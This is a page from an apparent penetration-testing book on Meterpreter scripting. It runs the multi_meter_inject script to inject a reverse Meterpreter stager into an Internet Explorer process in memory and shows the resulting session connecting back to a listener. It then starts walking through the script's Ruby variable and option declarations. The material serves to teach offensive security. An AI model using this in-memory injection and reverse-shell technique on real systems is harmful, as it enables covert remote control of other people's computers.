background image

Meterpreter Scripting

237

We’ll inject our new Meterpreter shell into the 

iexplorer.exe

 process. 

This will spawn a second Meterpreter console completely within memory and 
will never write data to the disk.

Let’s run the 

multi_meter_inject

 command using some of the switches we 

reviewed earlier to see if it works:

meterpreter > 

run multi_meter_inject -mp 2808 -mr 172.16.32.129 -p 443

[*] Creating a reverse meterpreter stager: LHOST=172.16.32.129 LPORT=443
[*] Injecting meterpreter into process ID 2808
[*] Allocated memory at address 0x03180000, for 290 byte stager
[*] Writing the stager into memory...
[*] Sending stage (749056 bytes) to 172.16.32.170
[+] Successfully injected Meterpreter in to process: 2808

 [*] Meterpreter session 3 opened (172.16.32.129:443 -> 172.16.32.170:1098) at 

Tue Nov 30 22:37:29 -0500 2010

meterpreter >

As this output indicates, our command was successful and a new Meter-

preter session has been opened, as shown at  .

Now that you understand what this script can do, let’s examine how it 

works. We’ll break the script into chunks to help us parse its commands and 
overall structure.

First, variables and definitions are defined and the flags we want to pass 

to Meterpreter are set up:

# $Id: multi_meter_inject.rb 10901 2010-11-04 18:42:36Z darkoperator $
# $Revision: 10901 $
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-----------------------------------------------------------------------------
################## Variable Declarations ##################

@client = client
lhost    = Rex::Socket.source_address("1.2.3.4")
lport    = 4444
lhost    = "127.0.0.1"

pid = nil 

multi_ip = nil
multi_pid = []
payload_type = "windows/meterpreter/reverse_tcp"
start_handler = nil

@exec_opts = Rex::Parser::Arguments.new( 

        "-h"  => [ false,  "Help menu." ],
        "-p"  => [ true,   "The port on the remote host where Metasploit is 

listening (default: 4444)"],

        "-m"  => [ false,  "Start Exploit multi/handler for return connection"],
        "-pt" => [ true,   "Specify Reverse Connection Meterpreter Payload. 

Default windows/meterpreter/reverse_tcp"],

        "-mr" => [ true,   "Provide Multiple IP Addresses for Connections 

separated by comma."],

        "-mp" => [ true,   "Provide Multiple PID for connections separated by 

comma one per IP."]

)
meter_type = client.platform